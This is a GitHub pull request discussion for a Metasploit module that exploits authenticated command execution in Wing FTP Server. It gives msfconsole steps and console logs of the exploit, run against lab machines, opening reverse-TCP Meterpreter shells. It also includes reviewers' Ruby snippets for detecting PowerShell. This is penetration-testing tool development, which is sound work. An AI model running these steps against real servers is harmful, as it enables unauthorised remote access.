Improvements and documentation for wing_ftp_admin_exec #11077

Merged
merged 9 commits into from Mar 5, 2019

ide0x90 commented Dec 6, 2018

Notes

Improved the check method and added documentation. Also added a separate PowerShell target (see issue #10980) for in-memory execution.

If authentication is required for the exploit, we might as well go all the way, and do both the check and exploit using one authentication. Specific details about the installed Wing FTP Server version can only be obtained after authentication, so this makes it clear what version of the vulnerable app we are exploiting.

As of 12/10/2018, the module has been further improved to get hard evidence about the existence of the vulnerability.

Vulnerable application

All versions of Wing FTP Server from 3.0.0 and up are vulnerable.

Upgraded module has been tested on a Windows Server 2016 Datacenter x64 with the following versions:

  • Wing FTP Server 4.3.8
  • Wing FTP Server 6.0.2

Original module has been tested on Windows 7 SP1 and Windows 8.1 with the following versions:

  • Wing FTP Server 4.3.6
  • Wing FTP Server 4.3.8

Verification Steps

  • Start msfconsole
  • use exploit/windows/ftp/wing_ftp_admin_exec
  • set RHOST <target-ip>
  • set USERNAME <valid-username>
  • set PASSWORD <valid-password>
  • exploit
  • Verify that you get a shell

msf5 > use exploit/windows/ftp/wing_ftp_admin_exec 
msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set RHOST 192.168.136.151
RHOST => 192.168.136.151
msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set USERNAME admin
USERNAME => admin
msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set PASSWORD password
PASSWORD => password
msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set VERBOSE true
VERBOSE => true
msf5 exploit(windows/ftp/wing_ftp_admin_exec) > exploit

[*] Started reverse TCP handler on 192.168.136.146:4444 
[*] Authenticating...
[+] Authentication successful, got session cookie 14bcf0bbb389113e879e5dcaa561f65f
[*] Found Wing FTP Server 6.0.2
[*] Executing payload via PowerShell...
[*] Powershell command length: 5995
[*] Sending stage (179779 bytes) to 192.168.136.151
[*] Meterpreter session 1 opened (192.168.136.146:4444 -> 192.168.136.151:4895) at 2018-12-10 20:54:51 +0800

meterpreter > sysinfo
Computer        : 2K16DTCTR
OS              : Windows 2016 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > 

TODO

  • Implement version check using Gem::Version
  • Find some way to make CmdStager work with version 6.0.2

ide0x90 added some commits Dec 7, 2018

Added links to functionality and cleaned up `check`
to make it much cleaner per @bcoles's recommendations.
Improved version check, made requests more organic,
and made PowerShell work on version 6.0.2.

busterb commented Dec 8, 2018

Jenkins test this please

ide0x90 added some commits Dec 9, 2018

Removed offending code, added warning for users,
and updated documentation.

@bcoles bcoles added the delayed label Dec 10, 2018

@ide0x90 ide0x90 closed this Dec 10, 2018

@ide0x90 ide0x90 reopened this Dec 10, 2018

@jrobles-r7 jrobles-r7 self-assigned this Dec 12, 2018

wchen-r7 commented Feb 9, 2019

I have tested this module on:

  • Wing FTP Server 6.0.3 on Windows 10
  • Wing FTP Server 6.0.1 on Windows 10

In either powershell or command stager mode, the exploit doesn't seem to work. It does say the target is vulnerable though. Here's an example:

msf5 exploit(windows/ftp/wing_ftp_admin_exec) > check

[+] Authentication successful, got session cookie ca25df87f18f6497386425f0e0d80b03
[*] Found Wing FTP Server 6.0.1
[+] 172.16.249.129:5466 The target is vulnerable.
msf5 exploit(windows/ftp/wing_ftp_admin_exec) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] Authenticating...
[+] Authentication successful, got session cookie 6e77a346c47d7d17a7bbed1cbe60cf74
[*] Found Wing FTP Server 6.0.1
[*] Executing payload via PowerShell...
[*] Powershell command length: 5983
[-] Exploit aborted due to failure: unknown: 172.16.249.129:5466 - Something went wrong.
[*] Exploit completed, but no session was created.

By the way, I notice that the powershell path check is quite strict like this:

winenv_path.body.include?('C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\')

However, my Windows 10 box's Windows directory name is actually WINDOWS. So I suggest you change the statement to a regex:

winenv_path.body.match(/C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\/i)

Please let me know what info you need so you can reproduce the problem. If possible, maybe provide a vulnerable application for testing just to be sure? Thank you!

bcoles commented Feb 9, 2019

Is checking for 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\' the best way to determine whether PowerShell is present?
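The case-sensitivity problem raised in the two comments above, as an added example (not code from the module or from this PR): it compares the strict substring check, the suggested `/i` regex, and a per-entry match that goes one step further by ignoring drive letter, Windows directory name and trailing backslash. The helper names and the sample PATH values are constructed for illustration.

```ruby
# Added illustration; not code from the Metasploit module.
# Constructed sample PATH values, as different Windows hosts might report them.
SAMPLE_PATHS = {
  mixed_case:  'C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\',
  upper_case:  'C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\',
  other_drive: 'D:\\WINNT\\system32;D:\\WINNT\\System32\\WindowsPowerShell\\v1.0',
  none:        'C:\\Windows\\system32;C:\\Windows'
}.freeze

STRICT = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\'

# The strict check quoted in the review: exact, case-sensitive substring.
def strict_match?(path_value)
  path_value.include?(STRICT)
end

# The regex suggested in the review: same literal, case-insensitive.
def regex_match?(path_value)
  !path_value.match(/C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\/i).nil?
end

# Hypothetical per-entry variant: split PATH on ';', drop quotes and
# trailing backslashes, then compare only the directory suffix so the
# drive letter and Windows directory name do not matter.
# Returns the matching PATH entry as reported, or nil.
def powershell_dir(path_value)
  suffix = '\\system32\\windowspowershell\\v1.0'
  path_value.split(';').map(&:strip).find do |entry|
    entry.delete('"').sub(/\\+\z/, '').downcase.end_with?(suffix)
  end
end

if __FILE__ == $PROGRAM_NAME
  SAMPLE_PATHS.each do |name, value|
    puts format('%-12s strict=%-5s regex=%-5s entry=%s',
                name, strict_match?(value), regex_match?(value),
                powershell_dir(value).inspect)
  end
end
```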

ide0x90 commented Feb 10, 2019

@wchen-r7, I have attempted to make the PowerShell check less stringent based on your suggestions in commit 6d07979. I'm not sure that this is the cause of the failure, but before the latest commit I had remove_comspec set to true on the PowerShell command. Could that (setting remove_comspec to true) possibly be causing problems on your end? As for the vulnerable applications, I have installers for versions 4.3.8, 5.1.3, 6.0.1, 6.0.2 and 6.0.3. To where should I send these installers?

@bcoles, probably not. Fixed in commit 6d07979.

wchen-r7 commented Feb 11, 2019

Hey @Psi0NYX Thank you! I'll share a link with you on Google Drive; you can upload your vuln apps there.

wchen-r7 commented Feb 11, 2019

@Psi0NYX I've shared a link with you to imrandawoodjee.infosec@gmail.com.

h00die commented Feb 11, 2019

EDB has (most likely) 4.3.8 installer: https://www.exploit-db.com/exploits/34517

wchen-r7 commented Mar 5, 2019

Ok, works for me. Thank you for your patience and the apps @Psi0NYX. I'll land it now.

msf5 exploit(windows/ftp/wing_ftp_admin_exec) > check

[*] Found Wing FTP Server 4.3.8
[+] Found Powershell at C:\Windows\System32\WindowsPowerShell\v1.0\
[+] 172.16.249.130:5466 The target is vulnerable.
msf5 exploit(windows/ftp/wing_ftp_admin_exec) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] Found Wing FTP Server 4.3.8
[+] Found Powershell at C:\Windows\System32\WindowsPowerShell\v1.0\
[*] Executing payload via PowerShell...
[*] Sending stage (180291 bytes) to 172.16.249.130
[*] Meterpreter session 2 opened (172.16.249.1:4444 -> 172.16.249.130:49163) at 2019-03-05 12:40:49 -0600

meterpreter > 

wchen-r7 commented Mar 5, 2019

@h00die Nice find. Thank you.

@wchen-r7 wchen-r7 merged commit 6d07979 into rapid7:master Mar 5, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed

wchen-r7 added a commit that referenced this pull request Mar 5, 2019

msjenkins-r7 added a commit that referenced this pull request Mar 5, 2019

wchen-r7 commented Mar 5, 2019

Release Notes

This adds new module documentation for the wing_ftp_admin_exec exploit module, as well as an improved check and support for Powershell.
